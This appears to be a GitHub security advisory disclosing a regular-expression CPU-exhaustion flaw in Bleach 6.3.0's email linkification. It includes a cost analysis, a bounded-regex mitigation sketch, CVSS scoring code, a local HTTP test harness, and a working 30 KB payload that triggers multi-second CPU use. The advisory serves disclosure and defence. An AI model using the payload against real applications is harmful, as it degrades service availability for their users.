
Bleach linkify(parse_email=True) CPU exhaustion via unbounded email regex scanning

Moderate severity • GitHub Reviewed • Published Jun 5, 2026 in mozilla/bleach • Updated Jun 16, 2026

Package

bleach (pip)

Affected versions

= 6.3.0

Patched versions

None

Description

Summary

Bleach 6.3.0 exposes a documented email-linkification path through bleach.linkify(..., parse_email=True). The implementation scans attacker-controlled text with EMAIL_RE.finditer() over the full character token and has no length, timeout, or linear prefilter before applying the dot-atom email regex. A non-email payload around 30 KB causes multi-second CPU consumption per request/call, creating a direct availability risk for applications that enable email linkification on user-submitted text.

Affected Product

  • Package: bleach
  • Ecosystem: pip
  • Affected versions: verified in 6.3.0; exact first affected version not established
  • Patched versions: none known at finalization time
  • Tested version: 6.3.0
  • Audit commit/tag: v6.3.0 / 5546d5dbce60d08ccb99d981778d74044d646d4e
  • PyPI sdist SHA256: 6f3b91b1c0a02bb9a78b5a454c92506aa0fdf197e1d5e114d2e00c6f64306d22

Vulnerability Details

  • CWE: CWE-1333: Inefficient Regular Expression Complexity; related availability impact maps to CWE-400
  • Component: bleach/linkifier.py, build_email_re(), LinkifyFilter.handle_email_addresses()
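  • Root cause: handle_email_addresses() calls self.email_re.finditer(text) on attacker-controlled text. EMAIL_RE includes a repeated dot-atom local-part pattern, so a non-email string such as repeated "a." segments with no "@" forces long failing scans: each match attempt walks the rest of the dot-atom run before failing at the missing "@", and finditer() repeats that attempt from each later start position.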
  • Security boundary violated: user-submitted text processed by a documented safe linkification helper should not allow an attacker to impose superlinear CPU cost through non-email text.
  • Direct impact: per-request CPU exhaustion / denial-of-service risk in applications that enable parse_email=True on attacker-controlled text.
  • Chain impact, if any: one proof run observed an unrelated /health request delayed during a concurrent attack request, but this was not reliable across reviewer retests. Treat cross-request service degradation as environment-dependent supporting evidence, not the primary impact.
  • Severity estimate: Medium / availability-only. The feature is opt-in and deployment body limits/timeouts affect practical severity.
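A simplified cost model makes the superlinear claim concrete. Assume, as an approximation that ignores constant factors and the domain part of the pattern, that an attempt costs one step per "a." segment it walks over. With m segments, finditer() starts an attempt at each of the m + 1 "a" characters (attempts at "." fail immediately), and the attempt starting at the k-th "a" walks the remaining m - k + 1 segments before failing at the missing "@":

```latex
W(m) \approx \sum_{k=0}^{m} (m - k + 1) = \frac{(m+1)(m+2)}{2} \approx \frac{m^{2}}{2},
\qquad
W(15000) = \frac{15001 \cdot 15002}{2} = 112{,}522{,}501 \approx 1.1 \times 10^{8},
\qquad
\frac{W(2m)}{W(m)} \to 4 .
```

Under this model, doubling the payload roughly quadruples the scan cost; absolute times depend on the regex engine and the machine.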

Relevant code path:

  • bleach/__init__.py:85-125: public linkify(text, ..., parse_email=False) constructs Linker(..., parse_email=parse_email) and calls linker.linkify(text).
  • bleach/linkifier.py:77-88: EMAIL_RE is compiled from the dot-atom email pattern.
  • bleach/linkifier.py:292-301: handle_email_addresses() applies self.email_re.finditer(text) to each character token.
  • bleach/linkifier.py:620-623: character tokens are routed into email handling only when parse_email is true.
  • docs/goals.rst:30-40: Bleach documents user comments, profile bios, and descriptions as target untrusted text use cases.
  • docs/linkify.rst:300-305: parse_email=True is the documented option for creating mailto: links.

Attack Preconditions

  • The consuming application enables the documented parse_email=True option, for example bleach.linkify(user_text, parse_email=True) or Linker(parse_email=True).linkify(user_text).
  • The attacker can submit text that reaches that linkification path. Authentication depends on the host application; a public comment form would make this unauthenticated, while account-only text fields require user privileges.
  • The application allows roughly 20-30 KB of text to reach Bleach and lacks a strict timeout or input cap before linkification.
  • No custom bounded email_re is supplied.
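One way to bound the scan is sketched below in plain Python re, independent of Bleach. Both patterns are hypothetical simplifications, not Bleach's EMAIL_RE: they share the same dot-atom local part and domain syntax, but BOUNDED_RE adds a one-character negative lookbehind so a match may only begin where the previous character is neither a local-part character nor a dot. Each maximal "a.a.a..." run is then scanned once from its start instead of once from every "a" inside it, which keeps the work roughly linear for this payload shape.

```python
import re
import time

# Characters permitted in an unquoted (dot-atom) local part.
ATOM_CHARS = r"-!#$%&'*+/=?^_`{|}~0-9A-Z"

# Hypothetical, simplified patterns for illustration; neither is Bleach's EMAIL_RE.
LOCAL_PART = rf"[{ATOM_CHARS}]+(?:\.[{ATOM_CHARS}]+)*"
DOMAIN = r"(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,}"

# Unbounded: finditer() may start a match at every "a" inside a long dot-atom run.
UNBOUNDED_RE = re.compile(LOCAL_PART + "@" + DOMAIN, re.IGNORECASE)

# Bounded: the negative lookbehind allows a match to start only where the
# previous character is not a local-part character or ".", so each run is
# scanned from its beginning once.
BOUNDED_RE = re.compile(
    rf"(?<![{ATOM_CHARS}.])" + LOCAL_PART + "@" + DOMAIN, re.IGNORECASE
)


def scan_seconds(pattern: re.Pattern[str], text: str) -> tuple[float, int]:
    """Return (elapsed seconds, match count) for one finditer() pass."""
    start = time.perf_counter()
    count = sum(1 for _ in pattern.finditer(text))
    return time.perf_counter() - start, count


if __name__ == "__main__":
    payload = ("a." * 4000) + "a"  # same shape as the report's payload, smaller
    for name, pattern in (("unbounded", UNBOUNDED_RE), ("bounded", BOUNDED_RE)):
        seconds, count = scan_seconds(pattern, payload)
        print(f"{name:>9}: {seconds:.4f} s, {count} matches")
```

The trade-off is a small behavior change: the lookbehind rejects matches that would begin mid-run, so "..x@example.com" is no longer partially linked as "x@example.com". Supplying a pattern like this through Linker's email_re argument is an assumption; Bleach's email handling may expect specific groups from its own EMAIL_RE.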

Reproduction

Minimal API trigger:

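import bleach
# 15000 "a." segments plus a trailing "a": 30001 characters with no "@"
payload = ("a." * 15000) + "a"
# Multi-second CPU time on Bleach 6.3.0 (see Proof Evidence)
bleach.linkify(payload, parse_email=True)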

The saved HTTP proof uses a local harness in which POST /preview calls bleach.linkify(request_body, parse_email=True) and a control endpoint calls it with parse_email=False on the same payload. The exploit sends baseline, control, and attack requests over HTTP to 127.0.0.1.
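A harness of this shape can be sketched with the standard library. This is a hypothetical reconstruction, not the reporter's exploit_proof.py: the /control route name, the ThreadingHTTPServer choice, and the pluggable linkify callable are assumptions. Bleach is imported only inside bleach_linkify, so the server and client helpers can be exercised with a stand-in function.

```python
import http.server
import threading
import time
import urllib.request
from typing import Callable

# Hypothetical reconstruction; route names and server model are assumptions.
LinkifyFn = Callable[[str, bool], str]
ROUTES = {"/preview": True, "/control": False}  # path -> parse_email


def make_handler(linkify: LinkifyFn) -> type:
    """Build a request handler that linkifies each POST body."""

    class PreviewHandler(http.server.BaseHTTPRequestHandler):
        def do_POST(self) -> None:
            if self.path not in ROUTES:
                self.send_error(404)
                return
            length = int(self.headers.get("Content-Length", "0"))
            body = self.rfile.read(length).decode("utf-8")
            html = linkify(body, ROUTES[self.path]).encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(html)))
            self.end_headers()
            self.wfile.write(html)

        def log_message(self, format: str, *args: object) -> None:
            pass  # silence per-request logging during timing runs

    return PreviewHandler


def bleach_linkify(text: str, parse_email: bool) -> str:
    """Adapter for the real library; bleach is imported lazily."""
    import bleach

    return bleach.linkify(text, parse_email=parse_email)


def start_in_background(linkify: LinkifyFn, port: int = 0) -> http.server.ThreadingHTTPServer:
    """Serve on 127.0.0.1 from a daemon thread; port 0 picks a free port."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", port), make_handler(linkify))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def timed_post(url: str, body: bytes) -> float:
    """POST body to url and return elapsed wall-clock seconds."""
    request = urllib.request.Request(url, data=body, method="POST")
    start = time.perf_counter()
    with urllib.request.urlopen(request) as response:
        response.read()
    return time.perf_counter() - start
```

With Bleach 6.3.0 installed, a run might start server = start_in_background(bleach_linkify) and then call timed_post() against /preview and /control on port server.server_address[1] with the report's ("a." * 15000) + "a" payload encoded as UTF-8. Whether concurrent requests are delayed depends on the server's worker model, which is why the report treats cross-request effects as environment-dependent.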

Proof Evidence

The proof ran against Bleach 6.3.0 installed from the audited local checkout in an isolated temporary venv. It used Python 3.12.3 on Linux.

Measured HTTP proof results:

  • Payload: ("a." * 15000) + "a" (30001 bytes)
  • Normal baseline /preview mean: 0.001425 seconds
  • Same 30 KB payload with parse_email=False: 0.048349 seconds
  • Attack payload with parse_email=True: 8.719818 seconds
  • Slowdown versus the larger of the baseline and control means: 180.35x
  • Requests sent by proof: 20
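The slowdown figure divides the attack mean by the larger of the two comparison means, which is the parse_email=False control:

```latex
\text{slowdown}
= \frac{t_{\text{attack}}}{\max\left(t_{\text{baseline}},\, t_{\text{control}}\right)}
= \frac{8.719818\ \text{s}}{\max(0.001425,\ 0.048349)\ \text{s}}
= \frac{8.719818}{0.048349}
\approx 180.35
```

Dividing by the normal baseline instead would give about 6,119x, so 180.35x is the more conservative of the two ratios.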

Evidence files:
poc.py
poc_results.json
exploit_proof.py
exploit_results.json

Scope and Limitations

  • This report does not claim XSS, authentication bypass, data disclosure, remote code execution, persistent crash, or persistent service outage.
  • parse_email=True is not the default. The affected path is a documented opt-in feature.
  • The exact first affected version is not established.
  • Practical impact depends on host application input limits, worker model, request timeout policy, and whether untrusted users can submit text to an email-linkification path.
  • A reviewer reproduced the direct CPU cost but did not reproduce the proof harness’s /health delay. The direct impact claim is therefore limited to per-request CPU exhaustion.
  • Bleach is marked deprecated in README.rst, and SECURITY.md has stale supported-version text, but the package still has a 2025 PyPI release and published Mozilla security reporting routes.

References

@willkg published to mozilla/bleach Jun 5, 2026
Published to the GitHub Advisory Database Jun 16, 2026
Reviewed Jun 16, 2026
Last updated Jun 16, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: Low

CVSS v3 base metric definitions

Attack vector: More severe the more remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
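The overall score can be recomputed from the vector string using the CVSS v3.1 base-score equations and metric weights published by FIRST. The helper below (base_score, a hypothetical name) is a sketch covering base metrics only, with no temporal or environmental metrics. For CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L it evaluates to 4.3, which falls in the CVSS v3 Medium band (4.0 to 6.9), consistent with the Moderate label above.

```python
import math

# Base-metric weights from the CVSS v3.1 specification (FIRST).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a vector string (hypothetical helper)."""
    parts = vector.split("/")
    if parts[0] != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    m = dict(part.split(":") for part in parts[1:])
    changed = m["S"] == "C"

    # Impact sub-score from confidentiality, integrity, and availability.
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    # Exploitability sub-score; PR weights depend on scope.
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]

    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))
```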


Weaknesses

Inefficient Regular Expression Complexity

The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.

CVE ID

No known CVE

GHSA ID

GHSA-g75f-g53v-794x
